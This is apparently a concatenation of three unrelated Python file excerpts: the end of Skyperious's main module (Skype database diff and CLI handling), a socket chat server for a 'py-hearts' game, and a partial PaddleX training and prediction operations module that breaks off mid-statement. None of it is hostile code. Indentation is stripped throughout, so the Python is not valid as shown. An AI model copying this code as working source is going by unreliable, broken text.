output("Error: cannot compare %s with itself." % filename1)
return
db1, db2 = map(skypedata.SkypeDatabase, [filename1, filename2])
counts = collections.defaultdict(lambda: collections.defaultdict(int))
postbacks = Queue.Queue()
bar_text = "%.*s.." % (50, " Scanning %s vs %s" % (db1, db2))
bar = ProgressBar(afterword=bar_text)
bar.start()
chats1, chats2 = db1.get_conversations(), db2.get_conversations()
db1.get_conversations_stats(chats1), db2.get_conversations_stats(chats2)
args = {"db1": db1, "db2": db2, "chats": chats1, "type": "diff_left"}
worker = workers.MergeThread(postbacks.put)
try:
worker.work(args)
while True:
result = postbacks.get()
if "error" in result:
output("Error scanning %s and %s:\n\n%s" %
(db1, db2, result["error"]))
break # while True
if "done" in result:
break # while True
if "chats" in result and result["chats"]:
counts[db1]["chats"] += 1
msgs = len(result["chats"][0]["diff"]["messages"])
msgs_text = util.plural("new message", msgs)
contacts_text = util.plural("new participant",
result["chats"][0]["diff"]["participants"])
text = ", ".join(filter(None, [msgs_text, contacts_text]))
bar.afterword = (" %s, %s." % (result["chats"][0]["chat"]["title"],
text))
counts[db1]["msgs"] += msgs
if "index" in result:
bar.max = result["count"]
bar.update(result["index"])
if result.get("output"):
logger.info(result["output"])
finally:
worker and (worker.stop(), worker.join())
bar.stop()
bar.afterword = " Scanned %s and %s." % (db1, db2)
bar.update(bar.max)
output()
def run_gui(filenames):
"""Main GUI program entrance."""
global logger, window
# Set up logging to GUI log window
logger.addHandler(guibase.GUILogHandler())
logger.setLevel(logging.DEBUG)
install_thread_excepthook()
sys.excepthook = except_hook
# Create application main window
app = wx.App(redirect=True) # stdout and stderr redirected to wx popup
# Avoid dialog buttons in native language
mylocale = wx.Locale(wx.LANGUAGE_ENGLISH_US, wx.LOCALE_LOAD_DEFAULT)
mylocale.AddCatalog("wxstd")
window = gui.MainWindow()
app.SetTopWindow(window) # stdout/stderr popup closes with MainWindow
# Some debugging support
window.run_console("import datetime, os, re, time, sys, wx")
window.run_console("# All %s modules:" % conf.Title)
window.run_console("from skyperious import conf, emoticons, export, "
"gui, guibase, images, live, main, searchparser, "
"skypedata, support, templates, workers")
window.run_console("from skyperious.lib import controls, util, wordcloud, wx_accel")
window.run_console("self = wx.GetApp().TopWindow # Application main window instance")
logger.info("Started application.")
for f in filter(os.path.isfile, filenames):
wx.CallAfter(wx.PostEvent, window, gui.OpenDatabaseEvent(file=f))
app.MainLoop()
def run(nogui=False):
"""Parses command-line arguments and either runs GUI, or a CLI action."""
global is_gui_possible, logger
warnings.simplefilter("ignore", UnicodeWarning)
if (getattr(sys, 'frozen', False) # Binary application
or sys.executable.lower().endswith("pythonw.exe")):
sys.stdout = ConsoleWriter(sys.stdout) # Hooks for attaching to
sys.stderr = ConsoleWriter(sys.stderr) # a text console
if "main" not in sys.modules: # E.g. setuptools install, calling main.run
srcdir = os.path.abspath(os.path.dirname(__file__))
if srcdir not in sys.path: sys.path.append(srcdir)
#sys.modules["main"] = __import__("main")
argparser = argparse.ArgumentParser(description=ARGUMENTS["description"])
for arg in ARGUMENTS["arguments"]:
argparser.add_argument(*arg.pop("args"), **arg)
subparsers = argparser.add_subparsers(dest="command")
for cmd in ARGUMENTS["commands"]:
kwargs = dict((k, cmd[k]) for k in cmd if k in ["help", "description"])
subparser = subparsers.add_parser(cmd["name"], **kwargs)
for arg in cmd["arguments"]:
kwargs = dict((k, arg[k]) for k in arg if k != "args")
subparser.add_argument(*arg["args"], **kwargs)
if "nt" == os.name: # Fix Unicode arguments, otherwise converted to ?
sys.argv[:] = win32_unicode_argv()
argv = sys.argv[1:]
if not argv or (argv[0] not in subparsers.choices
and argv[0].endswith(".db")):
argv[:0] = ["gui"] # argparse hack: force default argument
if argv[0] in ("-h", "--help") and len(argv) > 1:
argv[:2] = argv[:2][::-1] # Swap "-h option" to "option -h"
arguments, _ = argparser.parse_known_args(argv)
if hasattr(arguments, "FILE1") and hasattr(arguments, "FILE2"):
arguments.FILE1 = [util.to_unicode(f) for f in arguments.FILE1]
arguments.FILE2 = [util.to_unicode(f) for f in arguments.FILE2]
arguments.FILE = arguments.FILE1 + arguments.FILE2
if arguments.FILE: # Expand wildcards to actual filenames
arguments.FILE = sum([glob.glob(f) if "*" in f else [f]
for f in arguments.FILE], [])
arguments.FILE = sorted(set(util.to_unicode(f) for f in arguments.FILE))
conf.load()
if "gui" == arguments.command and (nogui or not is_gui_possible):
argparser.print_help()
status = None
if not nogui: status = ("\n\nwxPython not found. %s graphical program "
"will not run." % conf.Title)
sys.exit(status)
elif "gui" != arguments.command:
conf.IsCLI = True
conf.IsCLIVerbose = arguments.verbose
# Avoid Unicode errors when printing to console.
enc = sys.stdout.encoding or locale.getpreferredencoding() or "utf-8"
sys.stdout = codecs.getwriter(enc)(sys.stdout, "backslashreplace")
sys.stderr = codecs.getwriter(enc)(sys.stderr, "backslashreplace")
if conf.IsCLIVerbose:
handler = logging.StreamHandler(sys.stderr)
handler.setFormatter(logging.Formatter("%(asctime)s\t%(message)s"))
logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
else:
logger.addHandler(logging.NullHandler())
if "create" == arguments.command:
run_create(arguments.FILE, arguments.input,
arguments.username, arguments.password,
arguments.ask_password, arguments.store_password)
elif "diff" == arguments.command:
run_diff(*arguments.FILE)
elif "merge" == arguments.command:
run_merge(arguments.FILE, arguments.output)
elif "export" == arguments.command:
run_export(arguments.FILE, arguments.type, arguments.output,
arguments.chat, arguments.author, arguments.start_date,
arguments.end_date, arguments.images_folder,
arguments.ask_password, arguments.store_password)
elif "search" == arguments.command:
run_search(arguments.FILE, arguments.QUERY)
elif "sync" == arguments.command:
run_sync(arguments.FILE, arguments.username, arguments.password,
arguments.ask_password, arguments.store_password,
arguments.chat, arguments.author)
elif "gui" == arguments.command:
run_gui(arguments.FILE)
class ConsoleWriter(object):
"""
Wrapper for sys.stdout/stderr, attaches to the parent console or creates
a new command console, usable from python.exe, pythonw.exe or
compiled binary. Hooks application exit to wait for final user input.
"""
handle = None # note: class variables
is_loaded = False
realwrite = None
def __init__(self, stream):
"""
@param stream sys.stdout or sys.stderr
"""
self.encoding = getattr(stream, "encoding", locale.getpreferredencoding())
self.stream = stream
def flush(self):
if not ConsoleWriter.handle and ConsoleWriter.is_loaded:
self.stream.flush()
elif hasattr(ConsoleWriter.handle, "flush"):
ConsoleWriter.handle.flush()
def write(self, text):
"""
Prints text to console window. GUI application will need to attach to
the calling console, or launch a new console if not available.
"""
global window
if not window and win32console:
if not ConsoleWriter.is_loaded and not ConsoleWriter.handle:
self.init_console()
try: self.realwrite(text), self.flush()
except Exception: self.stream.write(text)
else:
self.stream.write(text)
def init_console(self):
"""Sets up connection to console."""
try:
win32console.AttachConsole(-1) # pythonw.exe from console
atexit.register(lambda: ConsoleWriter.realwrite("\n"))
except Exception:
pass # Okay if fails: can be python.exe from console
try:
handle = win32console.GetStdHandle(
win32console.STD_OUTPUT_HANDLE)
handle.WriteConsole("\n")
ConsoleWriter.handle = handle
ConsoleWriter.realwrite = handle.WriteConsole
except Exception: # Fails if GUI program: make new console
try: win32console.FreeConsole()
except Exception: pass
try:
win32console.AllocConsole()
handle = open("CONOUT$", "w")
argv = [util.longpath(sys.argv[0])] + sys.argv[1:]
handle.write(" ".join(argv) + "\n\n")
handle.flush()
ConsoleWriter.handle = handle
ConsoleWriter.realwrite = handle.write
sys.stdin = open("CONIN$", "r")
atexit.register(self.on_exe_exit)
except Exception:
try: win32console.FreeConsole()
except Exception: pass
ConsoleWriter.realwrite = self.stream.write
ConsoleWriter.is_loaded = True
def on_exe_exit(self):
"""atexit handler for compiled binary, keeps window open for a minute."""
q = Queue.Queue()
def waiter():
raw_input()
q.put(None)
def ticker():
countdown = 60
txt = "\rClosing window in %s.. Press ENTER to exit."
while countdown > 0 and q.empty():
output(txt % countdown, end=" ")
countdown -= 1
time.sleep(1)
q.put(None)
self.write("\n\n")
for f in waiter, ticker:
t = threading.Thread(target=f)
t.daemon = True
t.start()
q.get()
class ProgressBar(threading.Thread):
"""
A simple ASCII progress bar with a ticker thread, drawn like
'[---------\ 36% ] Progressing text..'.
or for pulse mode
'[ ---- ] Progressing text..'.
"""
def __init__(self, max=100, value=0, min=0, width=30, forechar="-",
backchar=" ", foreword="", afterword="", interval=1, pulse=False):
"""
Creates a new progress bar, without drawing it yet.
@param max progress bar maximum value, 100%
@param value progress bar initial value
@param min progress bar minimum value, for 0%
@param width progress bar width (in characters)
@param forechar character used for filling the progress bar
@param backchar character used for filling the background
@param foreword text in front of progress bar
@param afterword text after progress bar
@param interval ticker thread interval, in seconds
@param pulse ignore value-min-max, use constant pulse instead
"""
threading.Thread.__init__(self)
for k, v in locals().items(): setattr(self, k, v) if "self" != k else 0
self.daemon = True # Daemon threads do not keep application running
self.percent = None # Current progress ratio in per cent
self.value = None # Current progress bar value
self.pause = False # Whether drawing is currently paused
self.pulse_pos = 0 # Current pulse position
self.bar = "%s[%s%s]%s" % (foreword,
backchar if pulse else forechar,
backchar * (width - 3),
afterword)
self.printbar = self.bar # Printable text, with padding to clear previous
self.progresschar = itertools.cycle("-\\|/")
self.is_running = False
if not pulse: self.update(value, draw=False)
def update(self, value=None, draw=True):
"""Updates the progress bar value, and refreshes by default."""
if value is not None: self.value = min(self.max, max(self.min, value))
w_full = self.width - 2
if self.pulse:
if self.pulse_pos is None:
bartext = "%s[%s]%s" % (self.foreword,
self.forechar * (self.width - 2),
self.afterword)
else:
dash = self.forechar * max(1, (self.width - 2) / 7)
pos = self.pulse_pos
if pos < len(dash):
dash = dash[:pos]
elif pos >= self.width - 1:
dash = dash[:-(pos - self.width - 2)]
bar = "[%s]" % (self.backchar * w_full)
# Write pulse dash into the middle of the bar
pos1 = min(self.width - 1, pos + 1)
bar = bar[:pos1 - len(dash)] + dash + bar[pos1:]
bartext = "%s%s%s" % (self.foreword, bar, self.afterword)
self.pulse_pos = (self.pulse_pos + 1) % (self.width + 2)
else:
new_percent = int(round(100.0 * self.value / (self.max or 1)))
w_done = max(1, int(round((new_percent / 100.0) * w_full)))
# Build bar outline, animate by cycling last char from progress chars
char_last = self.forechar
if draw and w_done < w_full: char_last = next(self.progresschar)
bartext = "%s[%s%s%s]%s" % (
self.foreword, self.forechar * (w_done - 1), char_last,
self.backchar * (w_full - w_done), self.afterword)
# Write percentage into the middle of the bar
centertxt = " %2d%% " % new_percent
pos = len(self.foreword) + self.width / 2 - len(centertxt) / 2
bartext = bartext[:pos] + centertxt + bartext[pos + len(centertxt):]
self.percent = new_percent
self.printbar = bartext + " " * max(0, len(self.bar) - len(bartext))
self.bar = bartext
if draw: self.draw()
def draw(self):
"""Prints the progress bar, from the beginning of the current line."""
output("\r" + self.printbar, end=" ")
def run(self):
self.is_running = True
while self.is_running:
if not self.pause: self.update(self.value)
time.sleep(self.interval)
def stop(self):
self.is_running = False
def win32_unicode_argv():
# @from http://stackoverflow.com/a/846931/145400
result = sys.argv
from ctypes import POINTER, byref, cdll, c_int, windll
from ctypes.wintypes import LPCWSTR, LPWSTR
GetCommandLineW = cdll.kernel32.GetCommandLineW
GetCommandLineW.argtypes = []
GetCommandLineW.restype = LPCWSTR
CommandLineToArgvW = windll.shell32.CommandLineToArgvW
CommandLineToArgvW.argtypes = [LPCWSTR, POINTER(c_int)]
CommandLineToArgvW.restype = POINTER(LPWSTR)
argc = c_int(0)
argv = CommandLineToArgvW(GetCommandLineW(), byref(argc))
if argc.value:
# Remove Python executable and commands if present
start = argc.value - len(sys.argv)
result = [argv[i].encode("utf-8") for i in range(start, argc.value)]
return result
def get_password(username):
"""Asks user for password from keyboard input."""
result, prompt = "", "Enter Skype password for '%s': " % username
with warnings.catch_warnings():
warnings.simplefilter("ignore") # possible GetPassWarning
while not result:
output(prompt, end="") # getpass output can raise errors
result = getpass.getpass("", io.BytesIO()).strip()
return result
def output(s="", **kwargs):
"""Print wrapper, avoids "Broken pipe" errors if piping is interrupted."""
try: print(s, **kwargs)
except UnicodeError:
try:
if isinstance(s, str): print(s.decode(errors="replace"), **kwargs)
except Exception: pass
try:
sys.stdout.flush() # Uncatchable error otherwise if interrupted
except IOError as e:
if e.errno in (errno.EINVAL, errno.EPIPE):
sys.exit() # Stop work in progress if sys.stdout or pipe closed
raise # Propagate any other errors
if "__main__" == __name__:
try: run()
except KeyboardInterrupt: sys.exit()
|
server.py
|
import socket
import time
import threading
from player import Player
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # prevents address being unavailable when restarting server
host = "" # means can run anywhere basically
port = 3033
players = []
accepted_colours = ['aquamarine', 'blue', 'coral', 'cyan', 'gold', 'goldenrod', 'khaki', 'maroon',
'navy', 'orange', 'pink', 'purple', 'red', 'salmon', 'thistle', 'tomato', 'turquoise']
try:
s.bind((host, port))
s.listen(5)
print("Waiting for a connection on port {}".format(port))
def handle_command_from_player(message, player):
# slash has already been removed
args = message.split(" ")
if len(args) == 0: return
type = args[0]
if type == "name" and len(args) > 1:
original_name = player.name
desired_name = " ".join(message.split(" ")[1:])
if 0 < len(desired_name) <= 16:
player.name = desired_name
print("{} changed their username to {}".format(original_name, player.name))
connected = connected_players()
player.tell("You have set your username to {}\nCurrently connected ({}): {}".format(
player.name, len(players), connected))
broadcast_except_player("{} set their username to {}\nCurrently connected ({}): {}".format(
original_name, player.name, len(players), connected), player)
else:
print("{} wants (too long) username {}".format(original_name, desired_name))
elif type == "colour":
if len(args) > 1:
colour = args[1].lower()
if not colour: return
if colour in accepted_colours:
player.colour = colour
print("{} set their colour to {}".format(player.name, player.colour))
player.tell("You have set your colour to {}".format(colour), c=colour)
broadcast_except_player("{} set their colour to {}".format(player.name, player.colour), player)
elif "#" in colour:
print("{} wants to use hex code {} as their colour".format(player.name, colour))
player.tell("Sorry, hex codes are not supported!", c="red")
# todo support hex codes
else:
print("{} wants unsupported colour {}".format(player.name, colour))
player.tell("{} is not a recognised colour name".format(colour), c="red")
# todo ", try using hex codes instead"
else:
player.tell("You must enter a colour to use that command!")
elif type == "colours":
colour_strings = ["/colour {0} \t{0}".format(c) for c in accepted_colours]
player.tell("Colours:")
for cs in colour_strings: player.tell(cs)
elif type == "hand":
player.tell("/colour red This command is not ready yet")
elif type == "help":
player.tell(
"\nAvailable commands:" +
"\n /name [new name] - change your name" +
"\n /colour [new colour] - change your text colour" +
"\n /colours - list available colours" +
"\n /hand - show your current hand" +
"\n /help - see this message" +
"\n /exit - disconnect and close the application" +
"\n")
else:
print("{} attempted unrecognised command {}".format(player.name, message))
player.tell("You have attempted an unrecognised command: {}".format(message))
def get_next_message(p):
end_of_transmission = chr(23) # end of transmission char
with p.buffer_lock:
decoded = p.receive_buffer.decode("utf-8")
while p.keep_alive:
while end_of_transmission not in decoded:
time.sleep(0.1)
with p.buffer_lock:
decoded = p.receive_buffer.decode("utf-8")
# no full transmission yet, loop to check again
# now something new to check
if end_of_transmission in decoded: # double check to avoid failures
first_cut_off = decoded.index(end_of_transmission)
to_parse = decoded[:first_cut_off] # excluding EOT char
with p.buffer_lock:
p.receive_buffer = decoded[first_cut_off + 1:].encode() # excluding EOT char
return to_parse
else:
return "Error: EOT not found in get_next_message after loop break"
def receive_loop(p):
while p.keep_alive:
try:
data = p.conn.recv(4096)
if not data: # player disconnected if blocking call returns empty byte string
# print("{} disconnected from server".format(p.name))
p.keep_alive = False
with p.buffer_lock:
p.receive_buffer += data
except socket.error as ex:
p.keep_alive = False
print("Socket error {}".format(str(ex)))
def client_handler_main(player):
player.receive_buffer = b""
player.keep_alive = True
player.buffer_lock = threading.Lock()
rec_thread = threading.Thread(target=receive_loop, args=(player,))
rec_thread.setDaemon(True)
rec_thread.start()
# below is parse loop
player.tell("You have successfully connected to py-hearts!\n/help - for information on the commands")
while player.keep_alive:
try:
if not player.conn: break # player disconnect? probably not the way to check it
message = get_next_message(player)
if not message: continue
if message == "/exit": player.keep_alive = False; break # player definitely disconnected
if message.startswith("/"):
# command other than exit
handle_command_from_player(message[1:], player)
else:
print(player.name + ": " + message)
broadcast_except_player(player.name + ": " + message, player)
except Exception as ex:
print("Error in {}'s thread".format(player.name))
# maybe break here?
raise
player.conn.close()
try:
players.remove(player)
except:
pass
print("{} disconnected from server".format(player.name))
broadcast("{} disconnected from server".format(player.name))
def broadcast(message):
failed = []
for player in players:
if not player.tell(message):
failed.append(player)
for p in failed:
p.keep_alive = False
try:
players.remove(p)
except:
pass
for p in failed: broadcast("{} disconnected".format(p.name))
def broadcast_except_player(message, not_this_player):
failed = []
for player in players:
if player != not_this_player:
if not player.tell(message, not_this_player.colour):
failed.append(player)
for p in failed:
p.keep_alive = False
try:
players.remove(p)
except:
pass
for p in failed: broadcast("{} disconnected".format(p.name))
def connected_players(): return ', '.join([p.name for p in players])
while True:
try:
conn, addr = s.accept()
name = "anonymous_new_user"
print("{} connected from {}:{}".format(name, addr[0], addr[1]))
broadcast("{} has joined".format(name))
p = Player(name, conn)
players.append(p)
cli_thread = threading.Thread(target=client_handler_main, args=(p,))
cli_thread.setDaemon(True)
cli_thread.start()
except KeyboardInterrupt as user_cancelled:
print("\rExiting...")
break
except:
raise
except socket.error as ex:
print(str(ex))
s.close()
|
operate.py
|
# copytrue (c) 2020 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os.path as osp
import os
import numpy as np
from PIL import Image
import sys
import cv2
import psutil
import shutil
import pickle
import base64
import multiprocessing as mp
from ..utils import (pkill, set_folder_status, get_folder_status, TaskStatus,
PredictStatus, PruneStatus)
from .evaluate.draw_pred_result import visualize_classified_result, visualize_detected_result, visualize_segmented_result
from .visualize import plot_det_label, plot_insseg_label, get_color_map_list
from paddlex_restful.restful.dataset.utils import get_encoding
def _call_paddle_prune(best_model_path, prune_analysis_path, params):
mode = 'w'
sys.stdout = open(
osp.join(prune_analysis_path, 'out.log'), mode, encoding='utf-8')
sys.stderr = open(
osp.join(prune_analysis_path, 'err.log'), mode, encoding='utf-8')
task_type = params['task_type']
dataset_path = params['dataset_path']
os.environ['CUDA_VISIBLE_DEVICES'] = params['train'].cuda_visible_devices
if task_type == "classification":
from .prune.classification import prune
elif task_type in ["detection", "instance_segmentation"]:
from .prune.detection import prune
elif task_type == "segmentation":
from .prune.segmentation import prune
batch_size = params['train'].batch_size
prune(best_model_path, dataset_path, prune_analysis_path, batch_size)
set_folder_status(prune_analysis_path, PruneStatus.XSPRUNEDONE)
def _call_paddlex_train(task_path, params):
'''
Args:
params为dict,字段包括'pretrain_weights_download_save_dir': 预训练模型保存路径,
'task_type': 任务类型,'dataset_path': 数据集路径,'train':训练参数
'''
mode = 'w'
if params['train'].resume_checkpoint is not None:
params['train'].pretrain_weights = None
mode = 'a'
sys.stdout = open(osp.join(task_path, 'out.log'), mode, encoding='utf-8')
sys.stderr = open(osp.join(task_path, 'err.log'), mode, encoding='utf-8')
sys.stdout.write("This log file path is {}\n".format(
osp.join(task_path, 'out.log')))
sys.stdout.write("注意:标志为WARNING/INFO类的仅为警告或提示类信息,非错误信息\n")
sys.stderr.write("This log file path is {}\n".format(
osp.join(task_path, 'err.log')))
sys.stderr.write("注意:标志为WARNING/INFO类的仅为警告或提示类信息,非错误信息\n")
os.environ['CUDA_VISIBLE_DEVICES'] = params['train'].cuda_visible_devices
import paddlex as pdx
pdx.gui_mode = True
pdx.log_level = 3
pdx.pretrain_dir = params['pretrain_weights_download_save_dir']
task_type = params['task_type']
dataset_path = params['dataset_path']
if task_type == "classification":
from .train.classification import train
elif task_type in ["detection", "instance_segmentation"]:
from .train.detection import train
elif task_type == "segmentation":
from .train.segmentation import train
train(task_path, dataset_path, params['train'])
set_folder_status(task_path, TaskStatus.XTRAINDONE)
def _call_paddlex_evaluate_model(task_path,
model_path,
task_type,
epoch,
topk=5,
score_thresh=0.3,
overlap_thresh=0.5):
evaluate_status_path = osp.join(task_path, 'logs/evaluate')
sys.stdout = open(
osp.join(evaluate_status_path, 'out.log'), 'w', encoding='utf-8')
sys.stderr = open(
osp.join(evaluate_status_path, 'err.log'), 'w', encoding='utf-8')
if task_type == "classification":
from .evaluate.classification import Evaluator
evaluator = Evaluator(model_path, topk=topk)
elif task_type == "detection":
from .evaluate.detection import DetEvaluator
evaluator = DetEvaluator(
model_path,
score_threshold=score_thresh,
overlap_thresh=overlap_thresh)
elif task_type == "instance_segmentation":
from .evaluate.detection import InsSegEvaluator
evaluator = InsSegEvaluator(
model_path,
score_threshold=score_thresh,
overlap_thresh=overlap_thresh)
elif task_type == "segmentation":
from .evaluate.segmentation import Evaluator
evaluator = Evaluator(model_path)
report = evaluator.generate_report()
report['epoch'] = epoch
pickle.dump(report, open(osp.join(task_path, "eval_res.pkl"), "wb"))
set_folder_status(evaluate_status_path, TaskStatus.XEVALUATED)
set_folder_status(task_path, TaskStatus.XEVALUATED)
def _call_paddlex_predict(task_path,
predict_status_path,
params,
img_list,
img_data,
save_dir,
score_thresh,
epoch=None):
total_num = open(
osp.join(predict_status_path, 'total_num'), 'w', encoding='utf-8')
def write_file_num(total_file_num):
total_num.write(str(total_file_num))
total_num.close()
sys.stdout = open(
osp.join(predict_status_path, 'out.log'), 'w', encoding='utf-8')
sys.stderr = open(
osp.join(predict_status_path, 'err.log'), 'w', encoding='utf-8')
import paddlex as pdx
pdx.log_level = 3
task_type = params['task_type']
dataset_path = params['dataset_path']
if epoch is None:
model_path = osp.join(task_path, 'output', 'best_model')
else:
model_path = osp.join(task_path, 'output', 'epoch_{}'.format(epoch))
model = pdx.load_model(model_path)
file_list = dict()
predicted_num = 0
if task_type == "classification":
if img_data is None:
if len(img_list) == 0 and osp.exists(
osp.join(dataset_path, "test_list.txt")):
with open(osp.join(dataset_path, "test_list.txt")) as f:
for line in f:
items = line.strip().split()
file_list[osp.join(dataset_path, items[0])] = items[1]
else:
for image in img_list:
file_list[image] = None
total_file_num = len(file_list)
write_file_num(total_file_num)
for image, label_id in file_list.items():
pred_result = {}
if label_id is not None:
pred_result["gt_label"] = model.labels[int(label_id)]
results = model.predict(img_file=image)
pred_result["label"] = []
pred_result["score"] = []
pred_result["topk"] = len(results)
for res in results:
pred_result["label"].append(res['category'])
pred_result["score"].append(res['score'])
visualize_classified_result(save_dir, image, pred_result)
predicted_num += 1
else:
img_data = base64.b64decode(img_data)
img_array = np.frombuffer(img_data, np.uint8)
img = cv2.imdecode(img_array, cv2.COLOR_RGB2BGR)
results = model.predict(img)
pred_result = {}
pred_result["label"] = []
pred_result["score"] = []
pred_result["topk"] = len(results)
for res in results:
pred_result["label"].append(res['category'])
pred_result["score"].append(res['score'])
visualize_classified_result(save_dir, img, pred_result)
elif task_type in ["detection", "instance_segmentation"]:
if img_data is None:
if task_type == "detection" and osp.exists(
osp.join(dataset_path, "test_list.txt")):
if len(img_list) == 0 and osp.exists(
osp.join(dataset_path, "test_list.txt")):
with open(
osp.join(dataset_path, "test_list.txt"),
encoding=get_encoding(
osp.join(dataset_path, "test_list.txt"))) as f:
for line in f:
items = line.strip().split()
file_list[osp.join(dataset_path, items[0])] = \
osp.join(dataset_path, items[1])
else:
for image in img_list:
file_list[image] = None
total_file_num = len(file_list)
write_file_num(total_file_num)
for image, anno in file_list.items():
results = model.predict(img_file=image)
image_pred = pdx.det.visualize(
image, results, threshold=score_thresh, save_dir=None)
save_name = osp.join(save_dir, osp.split(image)[-1])
image_gt = None
if anno is not None:
image_gt = plot_det_label(image, anno, model.labels)
visualize_detected_result(save_name, image_gt, image_pred)
predicted_num += 1
elif len(img_list) == 0 and osp.exists(
osp.join(dataset_path, "test.json")):
from pycocotools.coco import COCO
anno_path = osp.join(dataset_path, "test.json")
coco = COCO(anno_path)
img_ids = coco.getImgIds()
total_file_num = len(img_ids)
write_file_num(total_file_num)
for img_id in img_ids:
img_anno = coco.loadImgs(img_id)[0]
file_name = img_anno['file_name']
name = (osp.split(file_name)[-1]).split(".")[0]
anno = osp.join(dataset_path, "Annotations", name + ".npy")
img_file = osp.join(dataset_path, "JPEGImages", file_name)
results = model.predict(img_file=img_file)
image_pred = pdx.det.visualize(
img_file,
results,
threshold=score_thresh,
save_dir=None)
save_name = osp.join(save_dir, osp.split(img_file)[-1])
if task_type == "detection":
image_gt = plot_det_label(img_file, anno, model.labels)
else:
image_gt = plot_insseg_label(img_file, anno,
model.labels)
visualize_detected_result(save_name, image_gt, image_pred)
predicted_num += 1
else:
total_file_num = len(img_list)
write_file_num(total_file_num)
for image in img_list:
results = model.predict(img_file=image)
image_pred = pdx.det.visualize(
image, results, threshold=score_thresh, save_dir=None)
save_name = osp.join(save_dir, osp.split(image)[-1])
visualize_detected_result(save_name, None, image_pred)
predicted_num += 1
else:
img_data = base64.b64decode(img_data)
img_array = np.frombuffer(img_data, np.uint8)
img = cv2.imdecode(img_array, cv2.COLOR_RGB2BGR)
results = model.predict(img)
image_pred = pdx.det.visualize(
img, results, threshold=score_thresh, save_dir=None)
image_gt = None
save_name = osp.join(save_dir, 'predict_result.png')
visualize_detected_result(save_name, image_gt, image_pred)
elif task_type == "segmentation":
if img_data is None:
if len(img_list) == 0 and osp.exists(
osp.join(dataset_path, "test_list.txt")):
with open(
osp.join(dataset_path, "test_list.txt"),
encoding=get_encoding(
osp.join(dataset_path, "test_list.txt"))) as f:
for line in f:
items = line.strip().split()
file_list[osp.join(dataset_path, items[0])] = \
osp.join(dataset_path, items[1])
else:
for image in img_list:
file_list[image] = None
total_file_num = len(file_list)
write_file_num(total_file_num)
color_map = get_color_map_list(256)
legend = {}
for i in range(len(model.labels)):
legend[model.labels[i]] = color_map[i]
for image, anno in file_list.items():
results = model.predict(img_file=image)
image_pred = pdx.seg.visualize(image, results, save_dir=None)
pse_pred = pdx.seg.visualize(
image, results, weight=0, save_dir=None)
image_ground = None
pse_label = None
if anno is not None:
label = np.asarray(Image.open(anno)).astype('uint8')
image_ground = pdx.seg.visualize(
image, {'label_map': label}, save_dir=None)
pse_label = pdx.seg.visualize(
image, {'label_map': label}, weight=0, save_dir=None)
save_name = osp.join(save_dir, osp.split(image)[-1])
visualize_segmented_result(save_name, image_ground, pse_label,
image_pred, pse_pred, legend)
predicted_num += 1
else:
img_data = base64.b64decode(img_data)
img_array = np.frombuffer(img_data, np.uint8)
img = cv2.imdecode(img_array, cv2.COLOR_RGB2BGR)
color_map = get_color_map_list(256)
legend = {}
for i in range(len(model.labels)):
legend[model.labels[i]] = color_map[i]
results = model.predict(img)
image_pred = pdx.seg.visualize(img, results, save_dir=None)
pse_pred = pdx.seg.visualize(img, results, weight=0, save_dir=None)
image_ground = None
pse_label = None
save_name = osp.join(save_dir, 'predict_result.png')
visualize_segmented_result(save_name, image_ground, pse_label,
image_pred, pse_pred, legend)
set_folder_status(predict_status_path, PredictStatus.XPREDONE)
def _call_paddlex_export_infer(task_path, save_dir, export_status_path, epoch):
# 导出模型不使用GPU
sys.stdout = open(
osp.join(export_status_path, 'out.log'), 'w', encoding='utf-8')
sys.stderr = open(
osp.join(export_status_path, 'err.log'), 'w', encoding='utf-8')
import os
os.environ['CUDA_VISIBLE_DEVICES'] = ''
os.environ['PADDLEX_EXPORT_STAGE'] = 'True'
os.environ['PADDLESEG_EXPORT_STAGE'] = 'True'
import paddlex as pdx
model_dir = "epoch_{}".format(epoch) if epoch is not None else "best_model"
model_path = osp.join(task_path, 'output', model_dir)
model = pdx.load_model(model_path)
model._export_inference_model(save_dir)
'''
model_dir = "epoch_{}".format(epoch)
model_path = osp.join(task_path, 'output', model_dir)
if os.path.exists(save_dir):
shutil.rmtree(save_dir)
shutil.copytree(model_path, save_dir)
'''
set_folder_status(export_status_path, TaskStatus.XEXPORTED)
set_folder_status(task_path, TaskStatus.XEXPORTED)
def _call_paddlex_export_quant(task_path, params, save_dir, export_status_path,
epoch):
sys.stdout = open(
osp.join(export_status_path, 'out.log'), 'w', encoding='utf-8')
sys.stderr = open(
osp.join(export_status_path, 'err.log'), 'w', encoding='utf-8')
dataset_path = params['dataset_path']
task_type = params['task_type']
os.environ['CUDA_VISIBLE_DEVICES'] = params['train'].cuda_visible_devices
import paddlex as pdx
if epoch is not None:
model_dir = "epoch_{}".format(epoch)
model_path = osp.join(task_path, 'output', model_dir)
else:
model_path = osp.join(task_path, 'output', 'best_model')
model = pdx.load_model(model_path)
if task_type == "classification":
train_file_list = osp.join(dataset_path, 'train_list.txt')
val_file_list = osp.join(dataset_path, 'val_list.txt')
label_list = osp.join(dataset_path, 'labels.txt')
quant_dataset = pdx.datasets.ImageNet(
data_dir=dataset_path,
file_list=train_file_list,
label_list=label_list,
transforms=model.test_transforms)
eval_dataset = pdx.datasets.ImageNet(
data_dir=dataset_path,
file_list=val_file_list,
label_list=label_list,
transforms=model.eval_transforms)
elif task_type == "detection":
train_file_list = osp.join(dataset_path, 'train_list.txt')
val_file_list = osp.join(dataset_path, 'val_list.txt')
label_list = osp.join(dataset_path, 'labels.txt')
quant_dataset = pdx.datasets.VOCDetection(
data_dir=dataset_path,
file_list=train_file_list,
label_list=label_list,
transforms=model.test_transforms)
eval_dataset = pdx.datasets.VOCDetection(
data_dir=dataset_path,
file_list=val_file_list,
label_list=label_list,
transforms=model.eval_transforms)
elif task_type == "instance_segmentation":
train_json = osp.join(dataset_path, 'train.json')
val_json = osp.join(dataset_path, 'val.json')
quant_dataset = pdx.datasets.CocoDetection(
data_dir=osp.join(dataset_path, 'JPEGImages'),
ann_file=train_json,
